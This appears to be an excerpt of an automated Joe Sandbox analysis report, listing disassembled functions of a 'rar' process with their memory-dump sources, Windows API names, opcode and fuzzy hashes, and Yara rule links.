                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ChangeCloseFindNotificationReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1093378488-0
                                                                                                                                                                      • Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                                                                                                                                      • Instruction ID: 83c96004c6475513ca27efaee4bb749b22810367243f3ac4c336cfd6b29727bc
                                                                                                                                                                      • Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
                                                                                                                                                                      • Instruction Fuzzy Hash: 38117332514A5197E218AF64EA4495EA321F7C6791FC00232DB6D132A5CF39E476C714
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79D49F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: AFUM$default.sfx
                                                                                                                                                                      • API String ID: 0-2491287583
                                                                                                                                                                      • Opcode ID: 5c58a6b02527a807887d7dd99d9e895900dd773c01640ccf4200c385e9f96f03
                                                                                                                                                                      • Instruction ID: 3402a358f806032dd317e64fe0458eef12814aeee4f4e931acdad4705e302ae6
                                                                                                                                                                      • Opcode Fuzzy Hash: 5c58a6b02527a807887d7dd99d9e895900dd773c01640ccf4200c385e9f96f03
                                                                                                                                                                      • Instruction Fuzzy Hash: C6819623A0C68340EA74BB2195942FDA290AF5179DFC84033DE8D076E6DF6DA497C770
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A265BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileHandleType
                                                                                                                                                                      • String ID: @
                                                                                                                                                                      • API String ID: 3000768030-2766056989
                                                                                                                                                                      • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                      • Instruction ID: 0110971a1f9120a7f85a1dbf3f040d2108e281a5072bd64f151b2282e0b5bf9d
                                                                                                                                                                      • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                                                                                                                                      • Instruction Fuzzy Hash: 8221F622A0974240EB6C9B2C949053DA661EBC5730FE42337DA6E16BD4CE3CD482C316
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A0B9BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                      • String ID: CreateThread failed
                                                                                                                                                                      • API String ID: 1217111108-3849766595
                                                                                                                                                                      • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                      • Instruction ID: 7f870e6499170f3bf06398985ebd07c36b43224895bc068e7101a61ad943c281
                                                                                                                                                                      • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                      • Instruction Fuzzy Hash: F4116032A08A4292E709FF28E8805AEB760FBC4785FD44433E64D12659DF3CE557C710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A0BB80 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3094578987-0
                                                                                                                                                                      • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                      • Instruction ID: 0319433d52a5aa43dcb60dc516b0fba771a2f96da18f539c91fd24a7ca0a2eca
                                                                                                                                                                      • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                      • Instruction Fuzzy Hash: 79F0D622608B4283DA28AF29FA5047DA361FFC9B99FC40133DE9D0726DCF2CD5068B10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A22488 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                      • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                      • Instruction ID: fa7e274c142eb2a248cd6275ca97334d12356e0827bd860160cc737ac197ea45
                                                                                                                                                                      • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                      • Instruction Fuzzy Hash: 67E01A20A0871542EA4CBF689981B7E63526FD4741FC1643ACC0E563D2CE3DA40A8260
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79D7B44 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleFileHandleModeType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4141822043-0
                                                                                                                                                                      • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                      • Instruction ID: 028b383344c0250b178ffba30e06344ac8e8f5060c1e5c0e146f6d71644acd4b
                                                                                                                                                                      • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                      • Instruction Fuzzy Hash: D0E0C224F0460353FF5C6BA5A8AA17E8252DF99B84FC41036E80F4A350EE2CD4878320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79E4044 Relevance: 3.3, APIs: 2, Instructions: 336COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CharEnvironmentExpandStrings
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4052775200-0
                                                                                                                                                                      • Opcode ID: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
                                                                                                                                                                      • Instruction ID: 70a2b85c0d89390081601672b45f906432ae97c767158177fc7ebc489bff6024
                                                                                                                                                                      • Opcode Fuzzy Hash: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
                                                                                                                                                                      • Instruction Fuzzy Hash: C6E1A023A1D68385EB20AB64D4401BDE7A1FB91798FD44132EB9D07AE9DF7CE442C710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79E1AF0 Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF7D79D7EBE,00000000,00000000,00000000,00000000,00000007,00007FF7D79D7C48), ref: 00007FF7D79E1B8D
                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF7D79D7EBE,00000000,00000000,00000000,00000000,00000007,00007FF7D79D7C48), ref: 00007FF7D79E1BD7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                      • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                      • Instruction ID: edd244cf37fb1e6326275198a7f725cff180c4e287c649bf4f8bf1158e749677
                                                                                                                                                                      • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                      • Instruction Fuzzy Hash: E1312663A1864646F770AF24D4053ADA6A0EB81B7CFD44336DEAC066C9DF7CC4868720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79F915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: c49ac57705657b9ad02248bfdb67f7e8506d1d3ae62ca3e52d0cb80bbf31b64f
                                                                                                                                                                      • Instruction ID: 5d2d24e50a7982c5482fb2619ac10098b193424e6d642ee79b3c96b856b36e74
                                                                                                                                                                      • Opcode Fuzzy Hash: c49ac57705657b9ad02248bfdb67f7e8506d1d3ae62ca3e52d0cb80bbf31b64f
                                                                                                                                                                      • Instruction Fuzzy Hash: 6A11E932509B8241EA04FB64A5403ADF2A4EF85794FD80236DA9D073E6DE3CD012C320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79E20B4 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                      • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                      • Instruction ID: 98a511f7247bfd1cdffaa201d319a21fdbdc3e0c3c3b9a25464974a426ce1564
                                                                                                                                                                      • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                      • Instruction Fuzzy Hash: F401EC22A1EA5341EA64AB25A50046DE361EF54BE4FE45232DA2D43BD5CE3CD4428710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79D7A68 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • setbuf.LIBCMT ref: 00007FF7D79D7A7B
                                                                                                                                                                        • Part of subcall function 00007FF7D7A22AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D7A27EF3
                                                                                                                                                                      • setbuf.LIBCMT ref: 00007FF7D79D7A8F
                                                                                                                                                                        • Part of subcall function 00007FF7D79D7B44: GetStdHandle.KERNEL32(?,?,?,00007FF7D79D7A9E), ref: 00007FF7D79D7B4A
                                                                                                                                                                        • Part of subcall function 00007FF7D79D7B44: GetFileType.KERNELBASE(?,?,?,00007FF7D79D7A9E), ref: 00007FF7D79D7B56
                                                                                                                                                                        • Part of subcall function 00007FF7D79D7B44: GetConsoleMode.KERNEL32(?,?,?,00007FF7D79D7A9E), ref: 00007FF7D79D7B69
                                                                                                                                                                        • Part of subcall function 00007FF7D7A22ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D7A22AD0
                                                                                                                                                                        • Part of subcall function 00007FF7D7A22B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D7A22C1C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
